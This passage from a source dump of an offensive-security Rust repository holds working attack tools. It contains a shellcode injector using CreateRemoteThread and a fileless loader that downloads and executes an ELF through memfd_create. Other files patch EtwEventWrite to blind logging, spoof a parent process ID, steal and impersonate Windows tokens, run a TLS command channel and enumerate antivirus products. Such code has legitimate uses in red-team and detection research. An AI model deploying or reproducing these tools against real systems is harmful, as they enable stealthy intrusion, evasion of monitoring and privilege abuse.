CreateRemoteThread( 83 | process_handle, 84 | null_mut(), 85 | 0, 86 | Some(std::mem::transmute(shellcode_address as usize)), 87 | std::ptr::null_mut(), // Can be used to pass the first parameter to loader but we're using shellcode to call our loader with more parameters 88 | 0, 89 | null_mut(), 90 | ) 91 | }; 92 | 93 | // Close thread and process handle 94 | unsafe { 95 | CloseHandle(thread_handle); 96 | CloseHandle(process_handle); 97 | }; 98 | } 99 | 100 | /// Get process ID by name 101 | pub fn get_process_id_by_name(target_process: &str) -> Pid { 102 | let mut system = sysinfo::System::new(); 103 | system.refresh_all(); 104 | 105 | let mut process_id = 0; 106 | 107 | for process in system.process_by_name(target_process) { 108 | process_id = process.pid(); 109 | } 110 | return process_id; 111 | } 112 | 113 | #[allow(dead_code)] 114 | /// Gets user input from the terminal 115 | fn get_input() -> std::io::Result<()> { 116 | let mut buf = String::new(); 117 | std::io::stdin().read_line(&mut buf)?; 118 | Ok(()) 119 | } 120 | 121 | #[allow(dead_code)] 122 | /// Used for debugging 123 | pub fn pause() { 124 | match get_input() { 125 | Ok(buffer) => println!("{:?}", buffer), 126 | Err(error) => println!("error: {}", error), 127 | }; 128 | } 129 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/reflective_loader/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | -------------------------------------------------------------------------------- /memN0ps/srdi-rs/reflective_loader/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "reflective_loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [profile.release] 8 | opt-level = "z" # Optimize for size. 9 | lto = true # Enable Link Time Optimization 10 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 11 | panic = "abort" # Abort on panic 12 | strip = true # Automatically strip symbols from the binary. 13 | 14 | [lib] 15 | crate-type = ["cdylib"] 16 | 17 | [dependencies] 18 | ntapi = "0.3.7" 19 | obfstr = "0.3.0" 20 | 21 | [dependencies.windows-sys] 22 | version = "0.36.1" 23 | features = [ 24 | "Win32_Foundation", 25 | "Win32_Security", 26 | "Win32_System_Threading", 27 | "Win32_UI_WindowsAndMessaging", 28 | "Win32_System_Memory", 29 | "Win32_System_Diagnostics_Debug", 30 | "Win32_System_SystemServices", 31 | "Win32_System_WindowsProgramming" 32 | ] -------------------------------------------------------------------------------- /memN0ps/srdi-rs/sRDI.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/memN0ps/srdi-rs/sRDI.png -------------------------------------------------------------------------------- /memN0ps/srdi-rs/testdll/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "testdll" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | [lib] 8 | crate-type = ["cdylib"] 9 | 10 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 11 | [profile.release] 12 | opt-level = "z" # Optimize for size. 13 | lto = true # Enable Link Time Optimization 14 | codegen-units = 1 # Reduce number of codegen units to increase optimizations. 15 | panic = "abort" # Abort on panic 16 | strip = true # Automatically strip symbols from the binary. 17 | 18 | [dependencies.windows-sys] 19 | version = "0.36.1" 20 | features = [ 21 | "Win32_Foundation", 22 | "Win32_Security", 23 | "Win32_System_Threading", 24 | "Win32_UI_WindowsAndMessaging", 25 | "Win32_System_Memory", 26 | "Win32_System_Diagnostics_Debug", 27 | "Win32_System_SystemServices", 28 | "Win32_System_WindowsProgramming" 29 | ] -------------------------------------------------------------------------------- /memN0ps/srdi-rs/testdll/src/lib.rs: -------------------------------------------------------------------------------- 1 | use std::ffi::c_void; 2 | use windows_sys::Win32::{ 3 | Foundation::{BOOL, HINSTANCE}, 4 | System::SystemServices::DLL_PROCESS_ATTACH, 5 | UI::WindowsAndMessaging::MessageBoxA, 6 | }; 7 | 8 | #[no_mangle] 9 | #[allow(non_snake_case)] 10 | pub unsafe extern "system" fn DllMain( 11 | _module: HINSTANCE, 12 | call_reason: u32, 13 | _reserved: *mut c_void, 14 | ) -> BOOL { 15 | if call_reason == DLL_PROCESS_ATTACH { 16 | MessageBoxA( 17 | 0 as _, 18 | "Rust DLL injected!\0".as_ptr() as _, 19 | "Rust DLL\0".as_ptr() as _, 20 | 0x0, 21 | ); 22 | 23 | 1 24 | } else { 25 | 1 26 | } 27 | } 28 | 29 | #[no_mangle] 30 | #[allow(non_snake_case)] 31 | fn SayHello(user_data: *mut c_void, user_data_len: u32) { 32 | let user_data_slice = 33 | unsafe { core::slice::from_raw_parts(user_data as *const u8, user_data_len as _) }; 34 | let user_data = std::str::from_utf8(user_data_slice).unwrap(); 35 | let message = format!("Hello from {}", user_data); 36 | 37 | unsafe { 38 | MessageBoxA( 39 | 0 as _, 40 | message.as_ptr() as _, 41 | "SayHello!\0".as_ptr() as _, 42 | 0x0, 43 | ); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /memfd_create/.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | /.vscode 3 | -------------------------------------------------------------------------------- /memfd_create/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "memfd_create-rs" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.126" 10 | reqwest = {version = "0.11.10", features = ["blocking"]} -------------------------------------------------------------------------------- /memfd_create/README.md: -------------------------------------------------------------------------------- 1 | # memfd_create-rs 2 | 3 | Load binaries into memory and execute them without touching disk. 4 | 5 | MITRE ID: T1620 6 | 7 | A simple PoC C code can be found inside `src` folder. 8 | 9 | Main program will download the ELF and execute it from memory using the `memfd_create` technique. -------------------------------------------------------------------------------- /memfd_create/src/bar.c: -------------------------------------------------------------------------------- 1 | /* 2 | compile and deploit it on a HTTP server: 3 | gcc bar.c bar 4 | 5 | */ 6 | 7 | #include 8 | 9 | int main() { 10 | FILE *fptr; 11 | 12 | fptr = fopen("/tmp/woot.txt", "w+"); 13 | if (!fptr) { 14 | printf("Something went wrong"); 15 | } 16 | fprintf(fptr, "%s", "hello from memory"); 17 | fclose(fptr); 18 | 19 | return 0; 20 | } -------------------------------------------------------------------------------- /memfd_create/src/main.rs: -------------------------------------------------------------------------------- 1 | use libc::{c_char, execve, getpid, memfd_create, write}; 2 | use reqwest; 3 | use std::ffi::CString; 4 | 5 | fn download_elf() -> Vec { 6 | let url = "http://127.0.0.1:9090/bar"; 7 | let client = reqwest::blocking::Client::builder() 8 | .danger_accept_invalid_certs(true) 9 | .build() 10 | .unwrap(); 11 | let binary = client.get(url).send().unwrap().bytes().unwrap(); 12 | binary.to_vec() 13 | } 14 | 15 | fn main() { 16 | /* casting &str to *const c_char */ 17 | let rs_name: &str = "foo"; 18 | let c_str = CString::new(rs_name).unwrap(); 19 | let c_name = c_str.as_ptr() as *const c_char; 20 | 21 | let elf = download_elf(); 22 | 23 | unsafe { 24 | let c_elf = elf.as_ptr(); 25 | let fd = memfd_create(c_name, 0); 26 | let pid = getpid(); 27 | 28 | println!("[+] PID: {}", pid); 29 | println!("[+] File descriptor: {:?}", fd); 30 | 31 | let written_bytes = write(fd, c_elf as _, elf.len()); 32 | 33 | if written_bytes != 0 { 34 | println!("[+] Memory written!"); 35 | } 36 | 37 | let path = format!("/proc/{}/fd/{}", pid, fd); 38 | let cs_path = CString::new(path).unwrap(); 39 | let c_path = cs_path.as_ptr() as *const c_char; 40 | 41 | println!("[+] Full path at address: {:?}", c_path); 42 | println!("[+] Trying to execute ELF from memory..."); 43 | 44 | execve(c_path, std::ptr::null(), std::ptr::null()); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /offensiverust.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trickster0/OffensiveRust/8828a5dc32eb2a610a8d271f2004b955f7dde4e3/offensiverust.png -------------------------------------------------------------------------------- /patch_etw/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "patch_etw" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features =["processthreadsapi","memoryapi"]} 10 | kernel32-sys = "0.2.2" 11 | -------------------------------------------------------------------------------- /patch_etw/src/main.rs: -------------------------------------------------------------------------------- 1 | extern crate winapi; 2 | extern crate kernel32; 3 | use winapi::um::processthreadsapi::GetCurrentProcess; 4 | use std::ptr::null_mut; 5 | 6 | fn main() { 7 | unsafe { 8 | let modu = "ntdll.dll\0"; 9 | let handle = kernel32::LoadLibraryA(modu.as_ptr() as *const i8); 10 | let mthd = "EtwEventWrite\0"; 11 | let mini = kernel32::GetProcAddress(handle, mthd.as_ptr() as *const i8); 12 | let oldprotect : winapi::ctypes::c_ulong = 0; 13 | let hook = b"\xc3"; 14 | kernel32::VirtualProtectEx(GetCurrentProcess() as *mut std::ffi::c_void,mini as *mut std::ffi::c_void,1,0x40,oldprotect); 15 | kernel32::WriteProcessMemory(GetCurrentProcess() as *mut std::ffi::c_void,mini as *mut std::ffi::c_void,hook.as_ptr() as *mut std::ffi::c_void,1,null_mut()); 16 | kernel32::VirtualProtectEx(GetCurrentProcess() as *mut std::ffi::c_void,mini as *mut std::ffi::c_void,1,oldprotect,0x0); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /ppid_spoof/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "ppid_spoof" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | winapi = {version = "0.3.9", features = ["processthreadsapi","winnt","winbase","minwindef","impl-default", "heapapi","basetsd"]} 10 | -------------------------------------------------------------------------------- /ppid_spoof/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::mem; 2 | use std::ptr::null_mut; 3 | use winapi::ctypes::c_void; 4 | use winapi::shared::basetsd::SIZE_T; 5 | use winapi::um::heapapi::{GetProcessHeap, HeapAlloc}; 6 | use winapi::um::processthreadsapi::{ 7 | CreateProcessA, InitializeProcThreadAttributeList, OpenProcess, UpdateProcThreadAttribute,PROCESS_INFORMATION, 8 | }; 9 | use winapi::um::winbase::STARTUPINFOEXA; 10 | use winapi::um::winnt::{HANDLE, LPSTR}; 11 | 12 | 13 | fn main() { 14 | let mut attrsize: SIZE_T = Default::default(); 15 | let mut pi = PROCESS_INFORMATION::default(); 16 | let mut si = STARTUPINFOEXA::default(); 17 | unsafe { 18 | let mut openproc: HANDLE = OpenProcess(0x02000000, 0, 19400); //PPID 19 | 20 | InitializeProcThreadAttributeList(null_mut(), 1, 0, &mut attrsize); 21 | si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, attrsize) as _; 22 | InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &mut attrsize); 23 | UpdateProcThreadAttribute( 24 | si.lpAttributeList, 25 | 0, 26 | 0 | 0x00020000, 27 | (&mut openproc) as *mut *mut c_void as *mut c_void, 28 | mem::size_of::(), 29 | null_mut(), 30 | null_mut(), 31 | ); 32 | si.StartupInfo.cb = mem::size_of::() as u32; 33 | CreateProcessA( 34 | null_mut(), 35 | "notepad.exe\0".as_ptr() as LPSTR, 36 | null_mut(), 37 | null_mut(), 38 | 0, 39 | 0x00080000, 40 | null_mut(), 41 | null_mut(), 42 | &mut si.StartupInfo, 43 | &mut pi, 44 | ); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /tcp_ssl_client/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "tcp_ssl_client" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | openssl = { version = "0.10.26", features = ["vendored"] } 10 | -------------------------------------------------------------------------------- /tcp_ssl_client/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::io::{Read, Write}; 2 | use std::net; 3 | use std::net::{Ipv4Addr, TcpStream, SocketAddr}; 4 | use std::process::{Command, Stdio}; 5 | use std::str; 6 | use std::thread; 7 | use std::path::Path; 8 | use openssl::ssl::{SslMethod, SslConnector}; 9 | use std::ffi::OsStr; 10 | 11 | fn main() { 12 | let mut build = SslConnector::builder(SslMethod::tls()).unwrap(); 13 | build.set_verify(openssl::ssl::SslVerifyMode::NONE); 14 | let connector = build.build(); 15 | let addr = Ipv4Addr::new(127,0,0,1); 16 | let sockettest = SocketAddr::from((addr,4443)); 17 | let convertsocket = sockettest.to_string(); 18 | let convertip = addr.to_string(); 19 | let stream = TcpStream::connect(&convertsocket).unwrap(); 20 | let mut stream = connector.connect(&convertip,stream).unwrap(); 21 | loop { 22 | let mut recv = [0 as u8; 1024]; 23 | stream.read(&mut recv); 24 | let my_string = String::from_utf8_lossy(&recv); 25 | let mut splitted = my_string.split("\r"); 26 | println!("{:?}",splitted.next().unwrap()); 27 | stream.write_all(b"RUST IS GOOD FOR OFFSEC"); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /tcp_ssl_server/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "tcp_ssl_server" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | openssl = { version = "0.10.26", features = ["vendored"] } 10 | -------------------------------------------------------------------------------- /tcp_ssl_server/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::io; 2 | use std::env; 3 | use std::io::{Read, Write}; 4 | use std::net::{TcpListener, TcpStream}; 5 | use std::thread; 6 | use openssl::ssl::{SslMethod, SslAcceptor, SslStream, SslFiletype}; 7 | use std::sync::Arc; 8 | 9 | fn main() { 10 | let args: Vec = env::args().collect(); 11 | let port = &args[1]; 12 | let mut complete = "0.0.0.0:".to_string(); 13 | complete.push_str(&port); 14 | let mut acceptor = SslAcceptor::mozilla_intermediate(SslMethod::tls()).unwrap(); 15 | acceptor.set_private_key_file("server.key", SslFiletype::PEM).unwrap(); 16 | acceptor.set_certificate_chain_file("server.crt").unwrap(); 17 | acceptor.check_private_key().unwrap(); 18 | let acceptor = Arc::new(acceptor.build()); 19 | let listener2 = TcpListener::bind(&complete).unwrap(); 20 | println!("[+] Server listening on port {}",&port); 21 | for stream2 in listener2.incoming() { 22 | match stream2 { 23 | Ok(stream2) => { 24 | println!("New connection: {}", stream2.peer_addr().unwrap()); 25 | let acceptor = acceptor.clone(); 26 | thread::spawn(move || { 27 | let stream2 = acceptor.accept(stream2).unwrap(); 28 | handle_client(stream2) 29 | }); 30 | } 31 | Err(e) => { 32 | println!("Error: {}", e); 33 | } 34 | } 35 | } 36 | } 37 | 38 | fn handle_client(mut stream: SslStream) { 39 | loop { 40 | print!("Input: "); 41 | io::stdout().flush().expect("failed to get it"); 42 | let mut input = String::new(); 43 | io::stdin().read_line(&mut input); 44 | stream.write(&mut input.as_bytes()).unwrap(); 45 | let mut data = [0 as u8; 100]; 46 | stream.read(&mut data); 47 | let string = String::from_utf8_lossy(&data); 48 | println!("{}", string); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /token_manipulation/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "token_manipulation" 3 | version = "0.1.0" 4 | authors = ["Idov31 "] 5 | edition = "2021" 6 | 7 | [[bin]] 8 | name = "token_manipulation" 9 | path = "src/main.rs" 10 | 11 | [dependencies] 12 | winapi = {version= "0.3.9", features = ["errhandlingapi", "securitybaseapi", "handleapi", "processthreadsapi"]} -------------------------------------------------------------------------------- /token_manipulation/src/main.rs: -------------------------------------------------------------------------------- 1 | use std::{ 2 | env, 3 | ptr::null_mut 4 | }; 5 | use winapi::{ 6 | um::{ 7 | processthreadsapi::{ 8 | OpenProcess, 9 | OpenProcessToken 10 | }, 11 | winnt::{ 12 | MAXIMUM_ALLOWED, 13 | TOKEN_QUERY, 14 | TOKEN_DUPLICATE, 15 | TOKEN_IMPERSONATE, 16 | SecurityImpersonation, 17 | TokenPrimary, 18 | PROCESS_QUERY_LIMITED_INFORMATION 19 | }, 20 | handleapi::{INVALID_HANDLE_VALUE, CloseHandle}, 21 | securitybaseapi::{ 22 | DuplicateTokenEx, 23 | ImpersonateLoggedOnUser 24 | }, 25 | errhandlingapi::GetLastError 26 | }, 27 | shared::{ 28 | minwindef::{ 29 | FALSE, 30 | DWORD 31 | }, 32 | }, 33 | ctypes::c_void 34 | }; 35 | 36 | fn main() { 37 | let mut token: *mut c_void = null_mut(); 38 | let mut duplicated_token: *mut c_void = null_mut(); 39 | let args: Vec = env::args().collect(); 40 | 41 | if args.len() != 2 { 42 | println!("Usage: {} ", args[0]); 43 | return; 44 | } 45 | 46 | unsafe { 47 | let proc_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, args[1].parse::().unwrap()); 48 | 49 | if proc_handle == INVALID_HANDLE_VALUE || proc_handle == 0 as *mut c_void{ 50 | let last_error = GetLastError(); 51 | println!("[-] Failed to open process: {}", last_error); 52 | return; 53 | } 54 | println!("[+] Opened process"); 55 | 56 | if OpenProcessToken(proc_handle, TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &mut token) == 0 { 57 | let last_error = GetLastError(); 58 | println!("[-] Failed to open process token: {}", last_error); 59 | CloseHandle(proc_handle); 60 | return; 61 | } 62 | 63 | if DuplicateTokenEx(token, MAXIMUM_ALLOWED, null_mut(), SecurityImpersonation, TokenPrimary, &mut duplicated_token) == FALSE { 64 | let last_error = GetLastError(); 65 | println!("[-] Failed to duplicate token: {}", last_error); 66 | CloseHandle(token); 67 | CloseHandle(proc_handle); 68 | return; 69 | } 70 | println!("[+] Duplicated token"); 71 | 72 | if ImpersonateLoggedOnUser(duplicated_token) == FALSE { 73 | let last_error = GetLastError(); 74 | println!("[-] Failed to impersonate user: {}", last_error); 75 | CloseHandle(duplicated_token); 76 | CloseHandle(token); 77 | CloseHandle(proc_handle); 78 | return; 79 | } 80 | 81 | println!("[+] This thread running as the impersonated user!"); 82 | CloseHandle(duplicated_token); 83 | CloseHandle(token); 84 | CloseHandle(proc_handle); 85 | }; 86 | } 87 | -------------------------------------------------------------------------------- /wmi_execute/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "wmi_execute" 3 | version = "0.1.0" 4 | edition = "2018" 5 | author = "trickster0" 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | wmi = "0.9.0" 10 | -------------------------------------------------------------------------------- /wmi_execute/src/main.rs: -------------------------------------------------------------------------------- 1 | use wmi::{COMLibrary, WMIConnection}; 2 | use std::collections::HashMap; 3 | 4 | 5 | fn main() -> Result<(), Box> { 6 | let _initialized_com = COMLibrary::new()?; 7 | 8 | let wmi_con = unsafe { WMIConnection::with_initialized_com(Some("ROOT\\securitycenter2"))? }; 9 | let results: Vec> = wmi_con.raw_query("SELECT displayName FROM AntiVirusProduct").unwrap(); 10 | for av in results { 11 | println!("{:?}",av.get("displayName").unwrap()); 12 | } 13 | 14 | Ok(()) 15 | } 16 | --------------------------------------------------------------------------------